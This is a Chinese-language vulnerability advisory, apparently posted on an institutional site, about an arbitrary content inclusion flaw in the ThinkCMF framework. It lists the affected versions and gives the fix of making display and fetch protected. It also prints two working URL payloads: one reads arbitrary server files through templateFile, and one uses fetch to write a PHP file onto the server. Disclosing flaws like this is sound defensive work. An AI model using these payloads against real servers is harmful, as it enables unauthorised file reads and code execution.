当前位置: 首页 > 通知公告 > 正文

通知公告

ThinkCMF框架上的任意内容包含漏洞预警

信息来源: 发布日期: 2019-10-26 浏览次数:

ThinkCMF框架上的任意内容包含漏洞预警

1. 背景

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。

ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

官网:http://www.thinkcmf.com

2. 漏洞详情

攻击者可利用任意内容包含漏洞构造恶意的url,读取服务器文件,甚至可以向服务器写入任意内容的文件,达到远程代码执行的目的。

文件读取POC:

?a=display&templateFile=public/install/css/install.css (templateFile可以自定义读取文件)

写入文件EXP:

?a=fetch&content=<?php+file_put_contents("security.php","<?php+phpinfo();");

3. 影响版本

ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2

4. 修复建议

将HomebaseController.class.php和AdminbaseController.class.php类中display和fetch函数的修饰符改为protected。